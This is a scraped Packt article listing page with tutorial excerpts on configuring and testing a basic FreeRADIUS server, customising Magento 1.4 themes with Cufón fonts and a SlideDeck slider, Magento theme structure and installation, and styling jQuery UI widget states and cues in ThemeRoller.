After FreeRADIUS has been installed it needs to be configured for our requirements. This article by Dirk van der Walt, author of FreeRADIUS Beginner's Guide, will help you to get familiar with FreeRADIUS. It assumes that you already know the basics of the RADIUS protocol. In this article we shall: Perform a basic configuration of FreeRADIUS and test it Discover ways of getting help Learn the recommended way to configure and test FreeRADIUS See how everything fits together with FreeRADIUS (For more resources on this subject, see here.) Before you startThis article assumes that you have a clean installation of FreeRADIUS. You will need root access to edit FreeRADIUS configuration files for the basic configuration and testing. A simple setup We start this article by creating a simple setup of FreeRADIUS with the following: The localhost defined as an NAS device (RADIUS client) Alice defined as a test user After we have defined the client and the test user, we will use the radtest program to fill the role of a RADIUS client and test the authentication of Alice. Time for action – configuring FreeRADIUS FreeRADIUS is set up by modifying configuration files. The location of these files depends on how FreeRADIUS was installed: If you have installed the standard FreeRADIUS packages that are provided with the distribution, it will be under /etc/raddb on CentOS and SLES. On Ubuntu it will be under /etc/freeradius. If you have built and installed FreeRADIUS from source using the distribution's package management system it will also be under /etc/raddb on CentOS and SLEs. On Ubuntu it will be under /etc/freeradius. If you have compiled and installed FreeRADIUS using configure, make, make install it will be under /usr/local/etc/raddb. The following instructions assume that the FreeRADIUS configuration directory is your current working directory: Ensure that you are root in order to be able to edit the configuration files. FreeRADIUS includes a default client called localhost. This client can be used by RADIUS client programs on the localhost to help with troubleshooting and testing. Confirm that the following entry exists in the clients.conf file: client localhost { ipaddr = 127.0.0.1 secret = testing123 require_message_authenticator = no nastype = other} Define Alice as a FreeRADIUS test user. Add the following lines at the top of the users file. Make sure the second and third lines are indented by a single tab character: "alice" Cleartext-Password := "passme" Framed-IP-Address = 192.168.1.65, Reply-Message = "Hello, %{User-Name}" Start the FreeRADIUS server in debug mode. Make sure that there is no other instance running by shutting it down through the startup script. We assume Ubuntu in this case. $> sudo su#> /etc/init.d/freeradius stop#> freeradius -X You can also use the more brutal method of kill -9 $(pidof freeradius) or killall freeradius on Ubuntu and kill -9 $(pidof radius) or killall radiusd on CentOS and SLES if the startup script does not stop FreeRADIUS. Ensure FreeRADIUS has started correctly by confirming that the last line on your screen says the following: Ready to process requests. If this did not happen, read through the output of the FreeRADIUS server started in debug mode to see what problem was identified and a possible location thereof. Authenticate Alice using the following command: $> radtest alice passme 127.0.0.1 100 testing123 The debug output of FreeRADIUS will show how the Access-Request packet arrives and how the FreeRADIUS server responds to this request. Radtest will also show the response of the FreeRADIUS server: Sending Access-Request of id 17 to 127.0.0.1 port 1812 User-Name = "alice" User-Password = "passme" NAS-IP-Address = 127.0.1.1 NAS-Port = 100rad_recv: Access-Accept packet from host 127.0.0.1 port 1812,id=147, length=40 Framed-IP-Address = 192.168.1.65 Reply-Message = "Hello, alice" What just happened? We have created a test user on the FreeRADIUS server. We have also used the radtest command as a client to the FreeRADIUS server to test authentication. Let's elaborate on some interesting and important points. Configuring FreeRADIUS Configuration of the FreeRADIUS server is logically divided into different files. These files are modified to configure a certain function, component, or module of FreeRADIUS. There is, however, a main configuration file that sources the various sub-files. This file is called radiusd.conf. The default configuration is suitable for most installations. Very few changes are required to make FreeRADIUS useful in your environment. Clients Although there are many files inside the FreeRADIUS server configuration directory, only a few require further changes. The clients.conf file is used to define clients to the FreeRADIUS server. Before an NAS can use the FreeRADIUS server it has to be defined as a client on the FreeRADIUS server. Let's look at some points about client definitions. Sections A client is defined by a client section. FreeRADIUS uses sections to group and define various things. A section starts with a keyword indicating the section name. This is followed by enclosing brackets. Inside the enclosing brackets are various settings specific to that section. Sections can also be nested. Sometimes the section's keyword is followed by a single word to differentiate between sections of the same type. This allows us to have different client entries in clients.conf. Each client has a short name to distinguish it from the others. The clients.conf file is not the only file where client sections can be defined although it is the usual and most logical place. The following image shows nested client definitions inside a server section: (Move the mouse over the image to enlarge.) Client identification The FreeRADIUS server identifies a client by its IP Address. If an unknown client sends a request to the server, the request will be silently ignored. Shared secret The client and server also require to have a shared secret, which will be used to encrypt and decrypt certain AVPs. The value of the User-Password AVP is encrypted using this shared secret. When the shared secret differs between the client and server, FreeRADIUS server will detect it and warn you when running in debug mode: Failed to authenticate the user. WARNING: Unprintable characters in the password. Double-check the shared secret on the server and the NAS! Message-Authenticator When defining a client you can enforce the presence of the Message-Authenticator AVP in all the requests. Since we will be using the radtest program, which does not include it, we disable it for localhost by setting require_message_authenticator to no. Nastype The nastype is set to other. The value of nastype will determine how the checkrad Perl script will behave. Checkrad is used to determine if a user is already using resources on an NAS. Since localhost does not have this function or need we will define it as other. Common errors If the server is down or the packets from radtest cannot reach the server because of a firewall between them, radtest will try three times and then give up with the following message: radclient: no response from server for ID 133 socket 3 If you run radtest as a normal user it may complain about not having access to the FreeRADIUS dictionary file. This is required for normal operations. The way to solve this is either to change the permissions on the reported file or to run radtest as root.
Read more
  • 0
  • 0
  • 5073

article-image-magento-14-theming-making-our-theme-shine
Packt
23 Aug 2011
8 min read
Save for later

Magento 1.4 Theming: Making Our Theme Shine

Packt
23 Aug 2011
8 min read
  Magento 1.4 Theming Cookbook Over 40 recipes to create a fully functional, feature rich, customized Magento theme         Read more about this book       (For more resources on this subject, see here.) Looks quite interesting, doesn't it? Let's get started! Introduction You will find all the necessary code in the code bundle; however, some JavaScript libraries won't be included. Don't worry, they are very easy to find and download! Using Cufón to include any font we like in our theme This technique, which allows us to use any font we like in our site, is quite common these days, and is very, very useful. Years ago, if we wanted to include some uncommon font in our design, we could only do it by using a substitutive image. Nowadays, we have many options, such as some PHP extensions, @font-face, Flash (sIFR), and, of course, Cufón. And that last option is the one we are about to use. Getting ready If you would like to copy the code, instead of writing it, remember you can find all the necessary code in the code bundle in Chapter 5, recipe 1. How to do it... Ready to start this first recipe? Let's go: First we have to decide which font to use; this is totally up to you. In this example I'm going to use this one: http://www.dafont.com/aldo.font. It's a free font, and looks very good! Thanks to Sacha Rein. Just download it or find any other font of your liking. Now we need to use the Cufón generator in order to create the font package. We will go to this URL: http://cufon.shoqolate.com/generate/. There we will be able to see something similar to the following screenshot: On that screen we only have to follow all the instructions and click on the Let's do this button: This will create a file called Aldo_600.font.js, which will be the one we will be using in this example. But we also need something more, the Cufón library. Download it by clicking the Download button: After downloading the Cufón library, we will download a file called cufon-yui.js. We now have all the necessary tools. It's time to make use of them. First place cufon-yui.js and Aldo_600.font.js inside skin/frontend/default/rafael/js. Now we need to edit our layout file. Let's open: app/design/frontend/default/rafael/layout/page.xml. Once we have this file opened we are going to look for this piece of code: <action method="addCss"><stylesheet>css/960_24_col.css</stylesheet></action> <action method="addCss"><stylesheet>css/styles.css</stylesheet></action> And just below it we are going to add the following: <action method="addJs"><script>../skin/frontend/default/rafael/js/cufon-yui.js</script></action> <action method="addJs"><script>../skin/frontend/default/rafael/js/Aldo_600.font.js</script></action> See, we are adding our two JavaScript files. The path is relative to Magento's root JavaScript folder. With this done, our theme will load these two JS files. Now we are going to make use of them. Just open app/design/frontend/default/rafael/template/page/2columns-right.phtml. At the bottom of this file we are going to add the following code: <script type="text/javascript"> Cufon.replace('h1'); </script></body></html> And that's all we need. Check the difference! Before we had something like the following: And now we have this: Every h1 tag of our site will now use our Aldo font, or any other font of your liking. The possibilities are endless! How it works... This recipe was quite easy, but full of possibilities. We first downloaded the necessary JavaScript files, and then made use of them with Magento's add JS layout tag. Later we were able to use the libraries in our template as in any other HTML file. SlideDeck content slider Sometimes our home page is crowded with info, and we still need to place more and more things. A great way of doing so is using sliders. And the SlideDeck one offers a very configurable one. In this recipe we are going to see how to add it to our Magento theme. You shouldn't miss this recipe! How to do it... Making use of the slider in our theme is quite simple, let's see: First we need to go to http://www.slidedeck.com/ and download SlideDeck Lite, as we will be using the Lite version in this recipe. Once downloaded we will end up with a file called slidedeck-1.2.1-litewordpress-1.3.6.zip. Unzip it. Go to skin/frontend/default/rafael/css and place the following files in it: slidedeck.skin.css slidedeck.skin.ie.css back.png corner.png slides.png spines.png Next, place the following files in skin/frontend/default/rafael/js: jquery-1.3.2.min.js slidedeck.jquery.lite.pack.js Good, now everything is in place. Next, open: app/design/frontend/default/rafael/layout/page.xml. Now look for the following piece of code: <block type="page/html_head" name="head" as="head"> <action method="addJs"><script>prototype/prototype.js</script></action> <action method="addJs" ifconfig="dev/js/deprecation"><script>prototype/deprecation.js</script></action> <action method="addJs"><script>lib/ccard.js</script></action> Place the jQuery load tag just before the prototype one, so we have no conflict between libraries: <block type="page/html_head" name="head" as="head"> <action method="addJs"><script>../skin/frontend/default/rafael/js/jquery-1.3.2.min.js</script></action> <action method="addJs"><script>prototype/prototype.js</script></action> <action method="addJs" ifconfig="dev/js/deprecation"><script>prototype/deprecation.js</script></action> Also add the following code before the closing of the block: <action method="addCss"><stylesheet>css/slidedeck.skin.css</stylesheet></action><action method="addCss"><stylesheet>css/slidedeck.skin.ie.css</stylesheet></action><action method="addJs"><script>../skin/frontend/default/rafael/js/slidedeck.jquery.lite.pack.js</script></action> The following steps require us to log in to the administrator panel. Just go to: http://127.0.0.1/magento/index.php/admin. Now to CMS/Pages, open the home page one: Once inside, go to the Content tab. Click on Show/Hide editor. Find the following code: <div class="grid_18"> <a href="#"><img src="{{skin url='img_products/big_banner.jpg'}}" alt="Big banner" title="Big banner" /></a> </div><!-- Big banner → And replace it with the following: <div class="grid_18"> <style type="text/css"> #slidedeck_frame { width: 610px; height: 300px; } </style> <div id="slidedeck_frame" class="skin-slidedeck"> <dl class="slidedeck"> <dt>Slide 1</dt> <dd>Sample slide content</dd> <dt>Slide 2</dt> <dd>Sample slide content</dd> </dl> </div> <script type="text/javascript"> jQuery(document).ready(function($) { $('.slidedeck').slidedeck(); }); </script> <!-- Help support SlideDeck! Place this noscript tag onyour page when you deploy a SlideDeck to provide a link back! --> <noscript> <p>Powered By <a href="http://www.slidedeck.com"title="Visit SlideDeck.com">SlideDeck</a></p> </noscript></div><!-- Big banner → Save the page and reload the frontend. Our front page should have a slider just like the one seen in the following screenshot: And we are done! Remember you can place any content you want inside these tags: <dl class="slidedeck"> <dt>Slide 1</dt> <dd>Sample slide content</dd> <dt>Slide 2</dt> <dd>Sample slide content</dd> </dl> How it works... This recipe is also quite easy. We only need to load the necessary JavaScript files and edit the content of the home page, in order to add the necessary code.
Read more
  • 0
  • 0
  • 1315

article-image-magento-exploring-themes
Packt
16 Aug 2011
6 min read
Save for later

Magento: Exploring Themes

Packt
16 Aug 2011
6 min read
  Magento 1.4 Themes Design Magento terminology Before you look at Magento themes, it's beneficial to know the difference between what Magento calls interfaces and what Magento calls themes, and the distinguishing factors of websites and stores. Magento websites and Magento stores To add to this, the terms websites and stores have a slightly different meaning in Magento than in general and in other systems. For example, if your business is called M2, you might have three Magento stores (managed through the same installation of Magento) called: Blue Store Red Store Yellow Store In this case, Magento refers to M2 as the website and the stores are Blue Store, Red Store, and Yellow Store. Each store then has one or more store views associated with it too. The simplest Magento website consists of a store and store view (usually of the same name): A slightly more complex Magento store may just have one store view for each store. This is a useful technique if you want to manage more than one store in the same Magento installation, with each store selling different products (for example, the Blue Store sells blue products and the Yellow Store sells yellow products). If a store were to make use of more than one Magento store view, it might be, to present customers with a bi-lingual website. For example, our Blue Store may have an English, French, and Japanese store view associated with it: Magento interfaces An interface consists of one or more Magento themes that comprise how your stores look and function for your customers. Interfaces can be assigned at two levels in Magento: At the website level At the store view level If you assign an interface at the website level of your Magento installation, all stores associated with the interface inherit the interface. For example, imagine your website is known as M2 in Magento and it contains three stores called: Blue Store Red Store Yellow Store If you assign an interface at the website level (that is, M2), then the subsequent stores, Blue Store, Red Store, and Yellow Store, inherit this interface: If you assigned the interface at the store view level of Magento, then each store view can retain a different interface: Magento packages A Magento package typically contains a base theme, which contains all of the templates, and other files that Magento needs to run successfully, and a custom theme. Let's take a typical example of a Magento store, M2. This may have two packages: the base package, located in the app/design/frontend/base/ directory and another package which itself consists of two themes: The base theme is in the app/design/frontend/base/ directory. The second package contains the custom theme's default theme in the app/design/frontend/ default/ directory, which acts as a base theme within the package. The custom theme itself, which is the non-default theme, is in the app/design/frontend/our-custom- theme/default/ and app/design/frontend/our-custom-theme/custom-theme/ directories. By default, Magento will look for a required file in the following order: Custom theme directory: app/design/frontend/our-custom-theme/ custom-theme/ Custom theme's default directory: app/design/frontend/our-custom-theme/ default/ Base directory: app/design/frontend/base/ Magento themes A Magento theme fits in to the Magento hierarchy in a number of positions: it can act as an interface or as a store view. There's more to discover about Magento themes yet, though there are two types of Magento theme: a base theme (this was called a default theme in Magento 1.3) and a non-default theme. Base theme A base theme provides all conceivable files that a Magento store requires to run without error, so that non-default themes built to customize a Magento store will not cause errors if a file does not exist within it. The base theme does not contain all of the CSS and images required to style your store, as you'll be doing this with our non-default theme. Don't change the base package! It is important that you do not edit any files in the base package and that you do not attempt to create a custom theme in the base package, as this will make upgrading Magento fully difficult. Make sure any custom themes you are working on are within their own design package; for example, your theme's files should be located at app/design/ frontend/your-package-name/default and skin/frontend/ your-package-name/default. Default themes A default theme in Magento 1.4 changes aspects of your store but does not need to include every file required by Magento as a base theme does, though it must just contain at least one file for at least one aspect of a theme (that is, locales, skins, templates, layout): Default themes in Magento 1.3 In Magento 1.3, the default theme acted the way the base theme did in Magento 1.4, providing every file that your Magento store required to operate. Non-default themes A non-default theme changes aspects of a Magento store but does not need to include every file required by Magento as the base theme does; it must just contain at least one file for at least one aspect of a theme (that is, locales, skins, templates, layout): In this way, non-default themes are similar to a default theme in Magento. Non-default themes can be used to alter your Magento store for different seasonal events such as Christmas, Easter, Eid, Passover, and other religious festivals, as well as events in your industry's corporate calendar such as annual exhibitions and conferences. Blocks in Magento Magento uses blocks to differentiate between the various components of its functionality, with the idea that this makes it easier for Magento developers and Magento theme designers to customize the functionality of Magento and the look and feel of Magento respectively. There are two types of blocks in Magento: Content blocks Structural blocks Content blocks A content block displays the generated XHTML provided by Magento for any given feature. Content blocks are used within Magento structural blocks. Examples of content blocks in Magento include the following: The search feature Product listings The mini cart Category listings Site navigation links Callouts (advertising blocks) The following diagram illustrates how a Magento store might have content blocks positioned within its structural blocks: Simply, content blocks are the what of a Magento theme: they define what type of content appears within any given page or view within Magento. Structural blocks In Magento, a structural block exists only to maintain a visual hierarchy to a page. Typical structural blocks in a Magento theme include: Header Primary area Left column Right column Footer
Read more
  • 0
  • 0
  • 1656
article-image-magento-14-theming-working-existing-themes
Packt
16 Aug 2011
5 min read
Save for later

Magento 1.4 Theming: Working with Existing Themes

Packt
16 Aug 2011
5 min read
  Magento 1.4 Theming Cookbook Over 40 recipes to create a fully functional, feature rich, customized Magento theme         Read more about this book       (For more resources on this subject, see here.) Introduction As we have just noted, this article is going to be more practical. We are going to see some basic things that will help us modify the appearance of our site, from looking for free templates to the process of installing them and making some tiny changes. I am sure this article helps us establish a good foundation though most of the things we are going to see are quite simple, so this is going to be a good introduction. Installing a theme through Magento Connect We are going to see two ways in which we can install a new Magento theme. The first one is through Magento Connect. This involves a number of steps that we are going to follow along this recipe. Getting ready First we need to go to Magento Connect: http://www.magentocommerce.com/magentoconnect. There, search for the theme Magento Classic Theme Free, or, alternatively, load this link: http://www.magentocommerce.com/magento-connect/TemplatesMaster/extension/928/magento-classic-theme. How to do it... This theme, the Magento Classic Theme, is the one we are going to use through this article. Follow these steps to install it: First we need to log into our www.magentocommerce.com site account. This is a necessary step to get the Extension Key. The extension key can be found in a box that looks like the following screenshot: We also find some other useful info there, like the compatibility version, and the price, free in this case. There's also a button that says Get Extension Key. Click on that button: After clicking on the Get Extension Key button, the box that we can see in the preceding screenshot appears. On that image we must accept the license agreement, select the Magento version we are using, and again click on Get Extension Key: This is the last screen. We need to obtain the extension key and copy it as we are going to use it very soon. For the next steps we need to go to our Magento installation Admin area screen. There, carry out the following instructions: Go to System menu, then Magento Connect and finally Magento Connect Manager. The Magento Connect Manager screen will appear, just like the following screenshot: Here we need to insert the same login info as we used in our Magento Admin screen. In the next screen we need to insert the key we have just copied: When we click on the install button the installation process starts. It will only take a few seconds and the theme will be installed into our site. Fast and easy! How it works... We have just selected a theme from the Magento site, and installed it into our own Magento installation through the Magento Connect Manager. We can do this as many times as we want, and install as many themes as we need to. Installing a theme manually In this recipe we are going to see another method of installing themes into our Magento installation. This time we are going to see how to install a theme manually. Why is this important? Just because we may want to use themes that are not available through Magento Connect, as they can be themes purchased in other places, or downloaded from free themes. Getting ready In order to follow this method we need a downloaded theme. You can get the Magento Classic theme from this link: http://blog.templates-master.com/free-magento-classic-theme/ Once done, we will get a file called f002.classic_1.zip; just unzip it. Inside we will find many folders: graphic source: This folder has all the PSD files necessary to help us modify the theme installation: This folder is where we can find installation instructions template source 1.3.2: The theme is for Magento version 1.3.2 template source 1.4.0.1: This theme is for Magento 1.4.0.1 template source 1.4.1.0: This theme is for Magento 1.4.1.0 Though our Magento version is not 1.4.1.0, we could use the theme without problems. What can we find inside that folder? Another two folders: app skin This is the folder structure we should expect from a Magento theme. How to do it... Installing a theme is as easy as copying those two folders into our Magento installation, with all their sub folders and files. In our Magento installation you will see another app and skin folder, so the contents in the folder of the downloaded theme will combine with the already existing ones. No overwriting should occur. And that's all; we don't need to do anything else. Selecting the recently installed theme Good, now we have installed one theme, one way or the other. So, how do we enable this theme? In fact it's quite easy; we can achieve just that from our site admin panel. Getting ready If you haven't logged into your Magento installation, do it now. How to do it... Well, once we are inside the admin panel of our site, we need to carry out the following steps to select our new theme: Go to System menu, and then click on Configuration. Look at the General block and select Design. There you will see the following screenshot: There, in Current Package Name, we can leave it as default. In the Themes section, in the Default column, we can enter the name of the theme, f002 for this example. We are done. Click on the Save config button and refresh the frontend. You will be able to see the changes. How it works... We are done. We have just selected the new theme. As promised it was quite easy, wasn't it? Try it yourself!
Read more
  • 0
  • 0
  • 1289

article-image-jquery-ui-themes-states-cues-overlays-and-shadows
Packt
05 Aug 2011
7 min read
Save for later

jQuery UI Themes: States, Cues, Overlays and Shadows

Packt
05 Aug 2011
7 min read
jQuery UI Themes Beginner's Guide Create new themes for your JQuery site with this step-by-step guide States jQueryUi widgets are always in one state or another. These states also play a role in themes. A widget in one state should look different than widgets in another state. These different appearances are controlled by CSS style properties within the theme. States are especially prevalent in widgets that interact with mouse events. When a user hovers over a widget that is interested in these types of events, the widget changes into a hover state. When the mouse leaves the widget, it returns to a default state. Even when nothing is happening with a widget—no events are taking place that the widget is interested in—the widget is in a default state. The reason we need a default state for widgets is so that they can return to their default appearance. The appearance of these states is entirely controlled through the applied theme. In this section, we'll change the ThemeRoller settings for widget states. Time for action - setting default state styles Some widgets that interact with the mouse have a default state applied to them. We can adjust how this state changes the appearance of the widget using ThemeRoller settings: Continuing with our theme design, expand the Clickable: default state section. In the Background color & texture section, click on the texture selector in the middle. Select the inset hard texture. In the Background color & texture section, set the background opacity to 65%. Change the Border color setting value to #b0b0b0. Change the Icon color setting value to #555555: What just happened? We've just changed the look and feel of the default widget state. We changed the background texture to match that of the header theme settings. Likewise, we also changed the background opacity to 65%, also to match the header theme settings. The border color is now slightly darker - this looks better with the new default state background settings. Finally, the icon color was updated to match the default state font color. Here is what the sample button looked like before we made our changes: Here is what the sample button looks like after we've updated our theme settings: Time for action - setting hover state styles The same widgets that may be in a default state, for instance, a button, may also be in a hover state. Widgets enter a hover state when a user moves the mouse pointer over the widget. We want our user interface to give some kind of visual indication that the user has hovered over something they can click. It's time to give our theme some hover state styles: Continuing with our theme design, expand the Clickable: hover state section. In the Background color & texture section, click on the texture selector in the middle. Select the inset hard texture. Change the Border color setting value to #787878. Change the Icon color setting value to #212121: What just happened? When we hover over widgets that support the hover state, their appearance is now harmonized with our theme settings. The background texture was updated to match the texture of the default state styles. The border color is now slightly darker. This makes the widget really stand out when the user hovers over it. At the same, it isn't so dark that it conflicts with the rest of the theme settings. Finally, we updated the icon color to match that of the font color. Here is what the sample button widget looked like before we change the hover state settings: Here is what the sample button widget looked like after we updated the hover state theme settings: Time for action - setting active state styles Some jQuery UI widgets, the same widgets that can be in either a default or hover state, can also be in an active state. Widgets become active after a user clicks them. For instance, the currently selected tab in a tabs widget is in an active state. We can control the appearance of active widgets through the ThemeRoller: Continuing with our theme design, expand the Clickable: active state section. In the Background color & texture section, change the color setting value on the left to #f9f9f9. In the Background color & texture section, click the texture selector in the middle. Select the flat texture. In the Background color & texture section, set the opacity setting value on the right-hand side to 100%. Change the Border color setting value to #808080. Change the Icon color setting value to #212121: What just happened? Widgets in the active state will now use our updated theme styles. We've changed the background color to something only marginally darker. The reason being, we are using the highlight soft texture in our content theme settings. This means that the color gets lighter toward the top. The color at the top is what we're aiming for in the active state styles. The texture has been changed to flat. Flat textures, unlike the others, have no pattern - they're simply a color. Accordingly, we've changed the background opacity to 100%. We do this because for these theme settings, we're only interested in showing the color. The active state border is slightly darker, a visual cue to show that the widget is in fact active. Finally, like other adjustments we've made in our theme, the icon color now mirrors the text color. Here is what the sample tabs widget looked like before we changed the active state theme settings: Here is what the sample tabs widget looks like after we've updated the active state theme settings. Notice that the selected tab's border stands out among the other tabs and how the selected tab blends better with the tab content. Cues In any web application, it is important to have the ability to notify users of events that have taken place. Perhaps an order was successfully processed, or a registration field was entered incorrectly. Both occurrences are worth letting the user know about. These are types of cues. The jQuery UI theming framework defines two types of cues used to notify the user. These are highlights and errors. A highlight cue is informational, something that needs to be brought to the user's attention. An error is something exceptional that should not have happened. Both cue categories can be customized to meet the requirements of any theme. It is important to keep in mind that cues are meant to aggressively grab the attention of the user - not to passively display information. So the theme styles applied to these elements really stand out. In this section we'll take a look at how to make this happen with the ThemeRoller. Time for action - changing the highlight cue A user of your jQuery UI application has just saved something. How do they know it was successful? Your application needs to inform them somehow—it needs to highlight the fact that something interesting just happened. To do this, your application will display a highlight cue. Let's add some highlight styles to our theme: Continuing with our theme design, expand the Highlight section. In the Background color & texture section, change the color setting value to #faf2c7. In the Background color & texture section, change the opacity setting value to 85%. Change the Border color setting value to #f8df49. Change the Text color setting value to #212121: What just happened? The theme settings for any highlight cues we display for the user have been updated. The background color is a shade darker and the opacity has been increased by 10%. The border color is now significantly darker than the background color. The contrast between the background and border colors defined here are now better aligned with the background-border contrast defined in other theme sections. Finally, we've updated the text color to be the same as the text in other sections. This is not for a noticeable difference (there isn't any), but for consistency reasons. Here is what the sample highlight cue looked like before we updated the theme settings: Here is what the sample highlight widget looks like after the theme setting changes:
Read more
  • 0
  • 0
  • 2127